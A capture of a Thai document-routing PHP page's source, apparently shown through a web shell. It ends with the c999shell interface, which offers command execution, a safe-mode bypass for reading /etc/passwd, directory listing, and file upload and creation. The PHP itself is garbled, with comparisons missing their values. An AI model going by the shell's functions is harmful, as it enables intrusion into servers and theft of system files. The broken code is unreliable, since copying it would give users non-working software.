$oDlp1->SearchByKey($oDlc5->DlpID);  $oDlp1->GetRecord();   echo $oDlp1->DlpName?>)</td>
               <td width="44%" ><b>วันเวลาที่แจ้ง ::</b> <? list($DocD,$DocT) = preg_split('[ ]',$oNe->DocCommentDate); echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT);?></td>
        </tr>
        <tr><td  height=22><b>แจ้งถึง ::</b><? $oPS->SearchByKey($oNe->PsReceive); $oPS->GetRecord();  
                                echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;  ?>&nbsp;(<?     $oDlc5->SearchByKey($oNe->DlcIDReceive);  $oDlc5->GetRecord();    
                                
$oDlp1->SearchByKey($oDlc5->DlpID);  $oDlp1->GetRecord();   echo $oDlp1->DlpName?>)
                </td>
               <td><b>ข้อความแจ้งแก้ไข ::</b> <? echo $oNe->DocComment;?></td></tr>
        <? ?>
        <? if($oNe->statusDoc==|| $oNe->statusDoc==3){  ?>
      <tr><td height="22"><b>ผู้แก้ไข ::</b> <? $oPS->SearchByKey($oNe->PsSend); $oPS->GetRecord();  
                                echo 
"&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;  ?>&nbsp;(<?     $oDlc5->SearchByKey($oNe->DlcIDSend);  $oDlc5->GetRecord();    
                                
$oDlp1->SearchByKey($oDlc5->DlpID);  $oDlp1->GetRecord();   echo $oDlp1->DlpName?>)</td>
      <td><b>วันเวลาที่แก้ไข ::</b> <? list($DocD,$DocT) = preg_split('[ ]',$oNe->DocSendDate); echo abbreDate2($DocD,'/')."&nbsp;".a2th($DocT);?></td></tr>
      <? ?>      
    </table><? $i++; } ?>
    </td></tr>
      </table><? }?>            
      
        <?         //-----------------Line Doc--------------------------------------------------------------?>
        <br>
      <?   if($oDlc->DlcView=="Y"){ ?>
                    <table width="93%" border="0" align="center" cellpadding="0" cellspacing="0" >
      <tr><td align="right"><a onClick = "showline('<? echo $searchDoc;?>')" style="cursor:pointer;"><img src="../picture/button_showline.jpg"   border="0" style="cursor:pointer;"></a>
      &nbsp;<a onClick = "showline2('<? echo $searchDoc;?>')" style="cursor:pointer;"><img src="../picture/sign_tc.jpg"   border="0" style="cursor:pointer;"></a>&nbsp;
      </td></tr>
      </table>
      <table width="93%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#FFCC99" style="border-collapse:collapse">
      <tr><td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA"  background="../picture/table_header_bg4.gif">
        <tr>
          <td width="68%" height="25">
            <font color="<?php echo $GLOBALS["COLOR_FONT_1"]; ?>" size="2"><strong>&nbsp;เส้นทางเดินของหนังสือ</strong></font>
             </td>
        </tr>
      </table><br>
              <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" style="border-collapse:collapse">
                <tr> 
                  <td  align="center">
                   <div style="overflow: auto; height: 300px; width: 100%;">
                  <? $lineDoc=GetLineDoc($DocID,$oDoc->DocGroup,$oDoc->DsID,$DrsID).$oRs->DrsID
                          
//echo "lineDoc=".$lineDoc."<br>";
                        
while($lineDoc!=""){
                                list(
$line,$lineDoc)=preg_split('[,]',$lineDoc,2);
                                
//echo "=".$line."<br>";
                                
$oRs2->SearchByKey($line);
                                
$oRs2->GetRecord();
                                
$oDoc2->SearchByKey($oRs2->DocID);
                                
$oDoc2->GetRecord();
                                
$oDlc3->SearchByKey($oDoc2->DlcID); 
                                
$oDlc3->GetRecord(); 
                                   if(
$oRs2->DsID=="1"){
                            
?>
                                 
                    <table width="90%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#DADADA" >
                      <tr height=22>
                        <td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการลงรับของหน่วยงาน&nbsp;<? $oDP->SearchByKey($oDlc3->deptId); $oDP->GetRecord();  echo $oDP->deptName;?></strong><?  if($oRs2->DrsNoRegisReceive=='Y'){ ?>&nbsp;(รับหนังสือแต่ไม่ลงเลขรับใหม่)<? ?><br>
                        </td>
                      </tr>
                       <tr height=22>
                         <td width="33%">&nbsp;&nbsp;ชนิดหนังสือ : <? $oDt->SearchByKey($oDoc2->DtID);  $oDt->GetRecord(); echo $oDt->DtName?></td>
                        <td width="23%">เลขทะเบียน<? echo ShowNameRSDoc2($oDoc2->RsID);?> : <?php echo a2th($oDoc2->DocTypeNo);?></td>
                        <td width="44%">วันที่ลงทะเบียน : <?php 
                            
list($DocD,$DocT) = preg_split('[ ]',$oDoc2->DocDateCreate);
                            echo 
abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); ?></td>
                      </tr>
                      <tr height=22>
                        <td colspan="3">&nbsp;&nbsp;ลงรับโดย : <? $oPS->SearchByKey($oRs2->DrsReceivePersonId); $oPS->GetRecord();   ?>
                          <? echo "&nbsp;".GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName?> 
                          <?     $oDlp->SearchByKey($oDlc3->DlpID);  $oDlp->GetRecord();
                                      echo 
"&nbsp;(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->deptName).")"?></td>
                      </tr>
                      
                      <tr>
                      <td colspan=3><hr color="#C87904"></hr></td>
                      </tr>
                    </table>
                                     <? if($oRs2->DrsByPass=="Y"){
                                             
$oRs3->SearchByDrsFromDrsID($oRs2->DrsID);
                                            
$oRs3->GetRecord();                                     
                                     
?>
                                            <table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA">
                                             <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการส่งผ่าน</strong></td></tr>
                                             <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
                                                    <td width="0%"  align="center" ><strong>:</strong></td>
                                                    <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs2->DrsByPassPropose); ?></td>
                                             </tr>
                                             <tr height=22>
                                                <td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ส่งผ่าน</td>
                                                <td width="0%"  align="center" ><strong>:</strong></td>
                                                <td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>" align="center">
                                                <? $oPS->SearchByKey($oRs3->DrsPsIDCreate); $oPS->GetRecord();   ?>
                                                  <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"?> 
                                                  <?     $oDlc5->SearchByKey($oRs2->DlcID);  $oDlc5->GetRecord();    
                                                            
$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();            
                                                            echo 
"(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")";  
                                                            list(
$DocD,$DocT) = preg_split('[ ]',$oRs2->DrsSendDate );
                                                            echo 
"<br>".abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
                                                            
?>
                                                </td>
                                              </tr>
                                            <tr>
                                          <td colspan=3><hr color="#C87904"></hr></td>
                                          </tr>
                                             </table>
                                    <? }  //DrsByPass?>
    
                              <? }else if($oRs2->DsID=="2"){ ?>
                                  <table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" >
                                 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการเสนอลงนาม</strong></td></tr>
                                  <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
                                         <td width="0%"  align="center" ><strong>:</strong></td>
                                        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs2->DrsPropose); ?></td>
                                 </tr>
                                 <tr height=22>
                                    <td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้เสนอลงนาม</td>
                                    <td width="0%"  align="center" ><strong>:</strong></td>
                                    <?   $oRs3->SearchByKey($oRs2->DrsFromDrsID);
                                            
$oRs3->GetRecord();
                                    
?>
                                    <td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>" align="center">
                                    <? $oPS->SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord();   ?>
                                      <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"?> 
                                      <? 
                                                  $oDlc5
->SearchByKey($oRs2->DrsDlcIDCreate);  $oDlc5->GetRecord();    
                                                  
$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
                                                  echo 
"(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";  
                                                list(
$DocD,$DocT) = preg_split('[ ]',$oRs2->DrsReceiveDate );
                                                echo 
abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
                                                
?>
                                    </td>
                                  </tr>
                            
                                <tr>
                              <td colspan=3><hr color="#C87904"></hr></td>
                              </tr>
                                 </table>
                            <?             if($oRs2->DrsWSign=='Y'){  //case DrsWSign 
                                            
$oDws->SearchByDrsIDDocID($oRs2->DrsID,$oRs2->DocID);
                                            
$oDws->GetRecord();
                            
?>
                                <table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA">
                                 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการ<? echo $GLOBALS['DOCFORSIGNNAME'];?></strong></td></tr>
                                 <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
                                         <td width="0%"  align="center" ><strong>:</strong></td>
                                        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oDws->DocSign); ?></td>
                                 </tr>
                                 <tr height=22>
                                    <td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ลงนาม</td>
                                    <td width="0%"  align="center" ><strong>:</strong></td>
                                    <td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>"  align="center">
                                    <?  $oPS->SearchByKey($oDws->personId); $oPS->GetRecord();   ?>
                                      <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"?> 
                                      <?     $oDlc5->SearchByKey($oDws->DlcID);  $oDlc5->GetRecord();    
                                                  
$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
                                                  echo 
"(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";  
                                                list(
$DocD,$DocT) = preg_split('[ ]',$oDws->signDateTime);
                                                echo 
abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
                                                
?>
                                    </td>
                                  </tr>
                                <tr>
                              <td colspan=3><hr color="#C87904"></hr></td>
                              </tr>
                                 </table>
                            <? //case DrsWSign?>
                             <? }else if($oRs2->DsID=="3"){  
                                               
$oRs4->SearchByKey($oRs2->DrsFromDrsID);
                                            
$oRs4->GetRecord();
                                            if(
$oRs4->DrsByPass!="Y"){                
                           
?>
                                   <table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" >
                                 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการลงนาม</strong></td></tr>
                                 <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
                                         <td width="0%"  align="center" ><strong>:</strong></td>
                                        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs2->DrsSign); ?></td>
                                 </tr>
                                 <tr height=22>
                                    <td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ลงนาม</td>
                                    <td width="0%"  align="center" ><strong>:</strong></td>
                                    <td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>"  align="center">
                                    <? $oPS->SearchByKey($oRs2->DrsPsIDCreate); $oPS->GetRecord();   ?>
                                      <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"?> 
                                      <?     $oDlc5->SearchByKey($oRs2->DrsDlcIDCreate);  $oDlc5->GetRecord();    
                                                  
$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
                                                  echo 
"(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";  
                                                list(
$DocD,$DocT) = preg_split('[ ]',$oRs2->DrsReceiveDate );
                                                echo 
abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
                                                
?>
                                    </td>
                                  </tr>
                                <tr>
                              <td colspan=3><hr color="#C87904"></hr></td>
                              </tr>
                                 </table>
                                 <? 
                                    }else if(
$oRs2->DsID=="0" || $oRs2->DsID=="4" || $oRs2->DsID=="5"){  ?>
                                 <? // if($oRs2->DrsSendDate!="0000-00-00 00-00-00"){  //show status=3 send to person ?>
                                    <?   $oRs6->SearchByKey($oRs2->DrsID);
                                            
$oRs6->GetRecord();
                                            
//echo "DrsID=".$oRs6->DrsID."<br>"; 
                                    
?>
                                 <table width="90%" border="0" align="center" cellpadding="0" cellspacing="2" bordercolor="#DADADA" >
                                 <tr><td colspan="3">&nbsp;&nbsp;<strong>ข้อมูลการส่งถึงผู้รับผิดชอบ</strong></td></tr>
                                  <? if($oRs6->PtID!=&& $oRs6->PtID!=""){ 
                                             
$oPt->SearchByKey($oRs6->PtID);
                                            
$oPt->GetRecord();
                                 
?>
                                 <? if($oRs6->DrsSendDocNew!="0000-00-00 00:00:00"){  ?>
                                  <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ส่งเพิ่มเติม</td>
                                            <td><strong>:</strong></td>
                                            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;
                                            <? list($DocD2,$DocT2) = preg_split('[ ]',$oRs6->DrsSendDocNew);
                                                echo 
abbreDate2($DocD2,'/')."&nbsp;".a2th($DocT2); 
                                             
?></td>
                                </tr>
                                <? ?>
                                  <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ลักษณะหนังสือ</td>
                                            <td><strong>:</strong></td>
                                            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;<? echo $oPt->PtName?></td>
                                </tr>
                                <? ?>
                                <? if($oRs6->AnID!=&& $oRs6->AnID!=""){ 
                                          
$oAn->SearchByKey($oRs6->AnID);
                                        
$oAn->GetRecord();
                                 
?>
                                 <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ข้อมูลขึ้นเว็บ</td>
                                            <td><strong>:</strong></td>
                                            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;<? echo $oAn->AnName?>
                                            <br>&nbsp;&nbsp;&nbsp;&nbsp;แจ้งขึ้นเว็บ&nbsp;<? echo ShowNameonweb($oDoc2->DocShowInOut); ?>
                                            <br>&nbsp;&nbsp;&nbsp;&nbsp;วันที่ประกาศขึ้นเว็บ&nbsp;
                                            <?  if($oRs6->DrsstartDatePost!="0000-00-00"){
                                                        if(
$oRs6->DrsstartDatePost==$oRs6->DrsendDatePost){ 
                                                            echo 
abbreDate2($oRs6->DrsstartDatePost,'/');
                                                        }else{
                                                             echo  
abbreDate2($oRs6->DrsstartDatePost,'/')."&nbsp;ถึง&nbsp;".abbreDate2($oRs6->DrsendDatePost,'/');
                                                        }
                                                    }
                                            
?>
                                            </td>
                                </tr>
                                <? ?>
                                 <tr><td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;การบันทึกต่อเนื่อง</td>
                                         <td width="0%"  align="center" ><strong>:</strong></td>
                                        <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;<? echo nl2br($oRs6->DrsPropose); ?></td>
                                 </tr>
                                 <tr height=22>
                                    <td width="25%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้ส่งหนังสือ</td>
                                    <td width="0%"  align="center" ><strong>:</strong></td>
                                    <td width="75%" bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>"  align="center">
                                    <? $oPS->SearchByKey($oRs6->DrsPsIDCreate); $oPS->GetRecord();   ?>
                                      <? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName."&nbsp;"?> 
                                      <?     
                                                  $oDlc5
->SearchByKey($oRs6->DrsDlcIDCreate);  $oDlc5->GetRecord();    
                                                  
$oDlp->SearchByKey($oDlc5->DlpID);  $oDlp->GetRecord();
                                                  echo 
"(".ShowNamePosition($oDlp->DlpID,$oDlp->DlpName,$oDP->SearchDeptName($oDlc5->deptId)).")&nbsp;";  
                                                 
$oRs8->SearchByKey($oRs6->DrsFromDrsID);
                                                
$oRs8->GetRecord();
                                                list(
$DocD,$DocT) = preg_split('[ ]',$oRs8->DrsSendDate);
                                                echo 
abbreDate2($DocD,'/')."&nbsp;".a2th($DocT); 
                                                
?>
                                    </td>
                                  </tr>
                                  <?  //$oDoc3->SearchByKey($oRs6->DocID); $oDoc3->GetRecord();
                                              
if($oRs6->DrsDocDueDate!="0000-00-00"){  ?>
                                            <tr><td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;กำหนดระยะเวลาดำเนินการ</td>
                                            <td><strong>:</strong></td>
                                            <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;ภายในวันที่&nbsp;<? echo abbreDate2($oRs6->DrsDocDueDate,'/');?></td></tr>
                                <? ?>
                                <?      
                                        $MainPsDept
=$oRs9->SearchByDrsFromDrsIDDrsMainPsDept($oRs2->DrsFromDrsID);
                                        if(
$MainPsDept!="" && $MainPsDept!="0"){
                                            
$oDlc6->SearchByKey($MainPsDept);
                                            
$oDlc6->GetRecord();
                                            
$oDP3->SearchByKey($oDlc6->deptId); $oDP3->GetRecord(); 
                                
?>
                                <tr>
                                    <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;หน่วยงานรับผิดชอบหลัก</td><td><strong>:</strong></td>
                                    <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;<? echo $oDP3->deptName?></td>
                                </tr>
                                <?  ?>
                                <?      
                                        $MainPs
=$oRs7->SearchByDrsFromDrsIDDrsMainPsY($oRs2->DrsFromDrsID);
                                        if(
$MainPs!="" && $MainPs!="0"){
                                            
$oPS2->SearchByKey($MainPs); $oPS2->GetRecord(); 
                                
?>
                                <tr>
                                    <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_21"]; ?>">&nbsp;&nbsp;ผู้รับผิดชอบหลัก</td><td><strong>:</strong></td>
                                    <td bgcolor="<?php echo $GLOBALS["COLOR_BG_TD_22"]; ?>">&nbsp;&nbsp;&nbsp;&nbsp;<? echo GetPrefix($oPS2->prefixId).$oPS2->fName."&nbsp;".$oPS2->lName."&nbsp;"?></td>
                                </tr>
                                <?  ?>
                                <tr>
                              <td colspan=3><hr color="#C87904"></hr></td>
                              </tr>
                                 </table>
                                 <?  //show status=3 send to person?>
                          <?         //}
                        
}    //each lineDoc  ?>
                 </div> </td>
                </tr>
                <tr><td>&nbsp;</td></tr>
              </table>
      </td></tr></table>
      <? //DrsView?>
<br>
        <?  if($oDlp1->DlpPID==0){ 
//==================================================================================        
//========= จัดเก็บหนังสือในโฟลเดอร์ =========================================================        
//==================================================================================
        
?>
        <div id="showDIb" ><? //include("showSelectDIb_SignDoc.php");?></div>
        <? ?>
         <br>     
      </form>  
</fieldset>  <table width="95%" border="0" align="center">
        <tr> 
          <td width="137" align="left"><font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp;<strong>หมายเหตุ 
            : </strong>&nbsp;</font></td>
          <td width="1027" align="left"><img src="../picture/allregistered_ico.gif"   border="0" > 
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">คลิกเพื่อเปิดดูแฟ้มหนังสือ </font></td>
        </tr>
            <tr> 
          <td width="137">&nbsp;</td>
          <td width="1027" align="left">
            <font color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>" size="2">&nbsp; </font></td>
        </tr></table>

</td>
</tr>
</table>
</body>
</html>
<? }else{ include_once "unselectposition.php"; } ?>
<script language="javascript">
function checkFormat(p,q,r){
        if(r=="Y"){
                if(document.ff.cansend.checked){
                            var agree=confirm("คุณต้องการลงนามหนังสือและดำเนินการ\nส่งถึงผู้รับผิดชอบแน่นอนใช่หรือไม่ ?");
                            if (agree){
                                document.ff.method.value="addsign";
                                return true;
                            }else{
                                return false ;
                            }
                }else{
                        if(p==1){
                            window.alert("ไม่ได้กำหนดสิทธิ์ผู้ส่งหนังสือ \nกรุณาติดต่อผู้รับผิดชอบระบบ");
                            return false ;
                        }else if(q==1){
                            window.alert("ไม่ได้กำหนดผู้มีสิทธิ์ส่งหนังสือ \nกรุณาติดต่อผู้รับผิดชอบระบบ");
                            return false ;
                        }else{
                            var agree=confirm("คุณต้องการลงนามหนังสือแน่นอนใช่หรือไม่ ?");
                            if (agree){
                                document.ff.method.value="addsign";
                                return true;
                            }else{
                                return false ;
                            }
                        }
                }
            }else{
                        if(p==1){
                            window.alert("ไม่ได้กำหนดสิทธิ์ผู้ส่งหนังสือ \nกรุณาติดต่อผู้รับผิดชอบระบบ");
                            return false ;
                        }else if(q==1){
                            window.alert("ไม่ได้กำหนดผู้มีสิทธิ์ส่งหนังสือ \nกรุณาติดต่อผู้รับผิดชอบระบบ");
                            return false ;
                        }else{
                            var agree=confirm("คุณต้องการลงนามหนังสือแน่นอนใช่หรือไม่ ?");
                            if (agree){
                                document.ff.method.value="addsign";
                                return true;
                            }else{
                                return false ;
                            }
                        }
            }
            
}
function checkFormat2(docforsign){
                            var s="คุณต้องการลงนามเพื่อ"+docforsign+" แน่นอนใช่หรือไม่ ?";
                            var agree=confirm(s);
                            if (agree){
                                document.ff.method.value="addWsign";
                                return true;
                            }else{
                                return false ;
                            }
}
 function showline(p){ 
             FileName = "showlinedocTable.php?searchDoc="+p;
            var w=900;  
            var h=500;
            strOption = "scrollbars=yes,left=370,top=100,menubar=1,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption);
}
 function showline2(p){ 
             FileName = "showlinedocTable2.php?searchDoc="+p;
            var w=900;  
            var h=500;
            strOption = "scrollbars=yes,left=370,top=100,menubar=1,width=" + w + ",height=" + h;
            window.open(FileName,"",strOption);
}
function ShowInfoProposeSign(data,divID,showName,InputThai){
                str=showName;
                showName=str.replace(/_/gi,' ');
                if(XMLHttpRequestObject){
                    var obj = document.getElementById(divID);
                    data=data+"?showName="+showName+"&InputThai="+InputThai;
                    
                    XMLHttpRequestObject.open("GET",data);
                    XMLHttpRequestObject.onreadystatechange=function(){
                        if(XMLHttpRequestObject.readyState==4 && 
                            XMLHttpRequestObject.status==200){
                            obj.innerHTML=XMLHttpRequestObject.responseText;
                        }
                    }
                    XMLHttpRequestObject.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
                    XMLHttpRequestObject.send(null);
                }
}
function SetEndDoc(DlcSend){
        if(DlcSend=='Y'){
            if(document.ff.canendDoc.checked==1){
                document.ff.cansend.disabled=1;
                return true;
            }else{
                document.ff.cansend.disabled=0;
                return true;            
            }
            
        }
}
function SetCanEndDoc(){
            if(document.ff.cansend.checked==1){
                document.ff.canendDoc.disabled=1;
                return true;
            }else{
                document.ff.canendDoc.disabled=0;
                return true;            
            }
}
function noticeDoc(){
            if(document.ff.noticecomment.value==""){
                    alert("กรุณากรอกข้อความแจ้งแก้ไข");
                    return false ;
            }else{
                            var agree=confirm("คุณต้องการแจ้งแก้ไขข้อมูลรายละเอียดหนังสือไปยังผู้เสนอลงนามแน่นอนใช่หรือไม่ ?");
                            if (agree){
                                document.ff.method.value="editDocSign";
                                document.ff.submit();
                                return true;
                            }else{
                                return false ;
                            }
            }
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0136 ]--